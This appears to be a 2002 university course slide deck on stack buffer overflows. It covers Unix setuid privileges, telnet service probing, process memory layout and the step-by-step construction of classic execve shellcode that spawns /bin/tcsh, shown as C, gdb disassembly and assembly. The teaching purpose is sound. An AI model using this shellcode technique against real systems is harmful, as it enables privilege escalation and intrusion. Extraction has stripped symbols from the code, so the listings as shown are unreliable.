Buffer Overflow Attacks

1
Buffer Overflow Attacks

• Execution of Arbitrary Code
• Aparna Bajaj
• Amul Shah
• CS 6265 - Project Presentation
• September 3rd, 2002

2
Overview

• Introduction
• Unix Privileges
• Telnet
• Buffer Overflow
• Binary Attack Code
• Summary
• References

3
Introduction

• Defensive Training
• How to Test?
• Knowledge is Power

4
Unix Privileges

• Authorization
• File System
• amul_at_tokyols -ld /net/hc282/amul
• drwx--x--x 31 amul stud 4096 Apr 13
  1240 /net/hc282/amul
• Permission Inheritance
• amul_at_tokyols -l /usr/local/etc/ftpd
• -rwxr-xr-x 1 root root 466944 Mar 11
  1994 /usr/local/etc/ftpd
• SetUID
• amul_at_tokyols -l /usr/lib/fs/ufs/quota
• -r-sr-xr-x 1 root bin 15260 Oct 6
  1998 /usr/lib/fs/ufs/quota

5
Telnet

• Purpose
• provide a fairly general bi-directional
  eight-bit byte oriented communications facility.
• allow a standard method of interfacing terminal
  devices and terminal-oriented processes to each
  other.
• may also be used for terminal-terminal
  communication ("linking") and process-process
  communication distributed computation.

6
Telnet

• The Threat
• amul_at_tokyotelnet tokyo.cc.gatech.edu smtp
• Trying 130.207.114.15...
• Connected to tokyo.cc.gatech.edu.
• Escape character is ''.
• 220 tokyo.cc.gatech.edu ESMTP Sendmail
  8.10.2Sun/8.9.1 Sun, 14 Apr 2002 191120 -0400
  (EDT)
• amul_at_tokyotelnet tokyo.cc.gatech.edu ftp
• Trying 130.207.114.15...
• Connected to tokyo.cc.gatech.edu.
• Escape character is ''.
• 220 tokyo FTP server (SunOS 5.7) ready.

7
Buffer Overflow

• Process Address Space
• Stack Overflow
• Overwriting Memory Structures
• Address Redirection

8
Process Address Space
Low Address
Text
Data
BSS
Heap
Stack
Unallocated Memory
High Address

• Text - program instructions
• Data - initialized variables
• char name amul
• BSS - static uninitialized variables
• static char name128
• Heap - dynamically allocated variable data
• char name
• name (char ) malloc( 128, sizeof( char ))
• Stack - local variables
• char name128

9
Stack Overflow
Base Pointer
Low Address
Stack
Command Line Args Environment Variables
password
saved bp
uid
userpassword
return
somePtr
High Address
Stack Pointer
int checkpasswd (int uid, void somePtr) char
password128, userpassword128 load password
from password file into userpassword gets(passwor
d) return (strcmp(password, userpassword)
0)
10
Overwriting Memory

• Data Overwriting
• Address Overwriting
• Buffer Pointers
• Activation Records
• Long Jump Buffers
• Function Pointers

11
Redirection
Low Address
Text
Data
BSS
Heap
Stack
Unallocated Memory

• Guess work!
• All programs have the same starting stack pointer
• Offset starting SP
• Addresses are attack specific

12
Binary Attack Code

• / project_shellcode.c
• Amul Shah (amul_at_cc.gatech.edu)
• 03.25.2002
• This is a pseudo copy of aleph1's 1 attack
  shellcode
• How To Compile (use with gdb)
• gcc -ggdb -static project_shellcode.c -o
  shellcode
• /
• include ltstdio.hgt
• int main ()
• char name2
• name0 "/bin/tcsh"
• name1 0
• execve(name0, name, 0)
• exit(0)

13
Binary Attack Code

• (gdb) disassemble main
• Dump of assembler code for function main
• 0x8000130 ltmaingt pushl ebp save the old
  base pointer
• 0x8000131 ltmain1gt movl esp,ebp make the
  bp point to the sp
• 0x8000133 ltmain3gt subl 0x8,esp allocate
  8 bytes of space for the 2
• pointers. subtract from sp because the
• stack grows to lower addresses.
• 0x8000136 ltmain6gt movl 0x80027b8,0xffffff
  f8(ebp) copy the address
• of the string into name0
• 0x800013d ltmain13gt movl 0x0,0xfffffffc(eb
  p) copy null into name1
• 0x8000144 ltmain20gt pushl 0x0 push arg 3
  to execve onto the stack
• 0x8000146 ltmain22gt leal 0xfffffff8(ebp),e
  ax
• 0x8000149 ltmain25gt pushl eax push arg 2
  to execve onto the stack
• 0x800014a ltmain26gt movl 0xfffffff8(ebp),e
  ax
• 0x800014d ltmain29gt pushl eax push arg 1
  to execve onto the stack
• 0x800014e ltmain30gt call 0x80002bc
  lt__execvegt do execve(arg1,arg2,arg3)
• 0x8000153 ltmain35gt addl 0xc,esp
• 0x8000156 ltmain38gt movl ebp,esp
• 0x8000158 ltmain40gt popl ebp

14
Binary Attack Code

• (gdb) disassemble __execve
• Dump of assembler code for function __execve
• standard stack operations cut for brevity
• 0x80002c0 lt__execve4gt movl 0xb,eax hex
  syscall table index for execve
• 0x80002c5 lt__execve9gt movl 0x8(ebp),ebx
  copy string address to register
• 0x80002c8 lt__execve12gt movl
  0xc(ebp),ecx copy name to register
• 0x80002cb lt__execve15gt movl
  0x10(ebp),edx copy NULL to register
• 0x80002ce lt__execve18gt int 0x80 send
  interrupt into kernel
• 0x80002d0 lt__execve20gt movl eax,edx
• 0x80002d2 lt__execve22gt testl edx,edx
• 0x80002d4 lt__execve24gt jnl 0x80002e6
  lt__execve42gt
• 0x80002d6 lt__execve26gt negl edx
• 0x80002d8 lt__execve28gt pushl edx
• 0x80002d9 lt__execve29gt call 0x8001a34
  lt__normal_errno_locationgt
• 0x80002de lt__execve34gt popl edx
• 0x80002df lt__execve35gt movl
  edx,(eax)
• 0x80002e1 lt__execve37gt movl
  0xffffffff,eax
• 0x80002e6 lt__execve42gt popl ebx
• 0x80002e7 lt__execve43gt movl ebp,esp

15
Binary Attack Code

• (gdb) disassemble _exit
• Dump of assembler code for function _exit
• 0x800034c lt_exitgt pushl ebp
• 0x800034d lt_exit1gt movl esp,ebp
• 0x800034f lt_exit3gt pushl ebx
• 0x8000350 lt_exit4gt movl 0x1,eax copy
  syscall table index for exit
• 0x8000355 lt_exit9gt movl 0x8(ebp),ebx
  copy 0 into ebx. used exit(0)
• 0x8000358 lt_exit12gt int 0x80 send
  interrupt into kernel
• 0x800035a lt_exit14gt movl 0xfffffffc(ebp),e
  bx
• 0x800035d lt_exit17gt movl ebp,esp
• 0x800035f lt_exit19gt popl ebp
• 0x8000360 lt_exit20gt ret
• 0x8000361 lt_exit21gt nop
• 0x8000362 lt_exit22gt nop
• 0x8000363 lt_exit23gt nop
• End of assembler dump.

16
Binary Attack Code

• Have the string /bin/tcsh in memory
• Place a null in memory after the string
• Copy 0xb into eax
• Copy address of the pointer to string into ebx
• Copy address of string into ecx
• Copy NULL into edx
• Send interrupt 0x80 instruction
• Copy 0x1 into eax
• Copy 0x0 into ebx
• Send interrupt 0x80 instruction

• movl str_addr,str_addr_addr
• movb 0x0,null_byte_addr
• movl 0x0,null_addr
• movl 0xb,eax
• movl str_addr,ebx
• leal str_addr_addr,ecx
• leal null_string,edx
• int 0x80
• movl 0x1, eax
• movl 0x0, ebx
• int 0x80
• .string /bin/tcsh

17
Binary Attack Code

• jmp 0x2z 3 bytes
• popl esi 1 byte
• movl esi,0x8(esi) 3 bytes
• movb 0x0,0x7(esi) 4 bytes
• movl 0x0,0xc(esi) 7 bytes
• movl 0xb,eax 5 bytes
• movl esi,ebx 2 bytes
• leal 0x8(esi),ecx 3 bytes
• leal 0xc(esi),edx 3 bytes
• int 0x80 2 bytes
• movl 0x1, eax 5 bytes
• movl 0x0, ebx 5 bytes
• int 0x80 2 bytes
• call -0x2b 5 bytes
• .string /bin/tcsh 8 bytes

Low Address
Array Position 0
code is read
High Address
18
Summary

• What makes an application a good target
• Privileges
• Point of Access
• How to initiate a buffer overflow to do something
  meaningful
• Stack Smashing Attack
• How to create binary attack code

19
References

• WebSites
• Phrack e-Zine www.phrack.org
• BugTraq Archives hosted at www.geek-girl.com/bugt
  raq/
• nsfsecurity.pr.erau.edu
• Canonical Resources
• Aleph One. Smashing The Stack For Fun And
  Profit. Phrack, 14(49), November 1996
• Matt Conover and w00w00 Security Team. w00w00 on
  Heap Overflows. http//www.w00w00.org/articles.htm
  l, January 1999.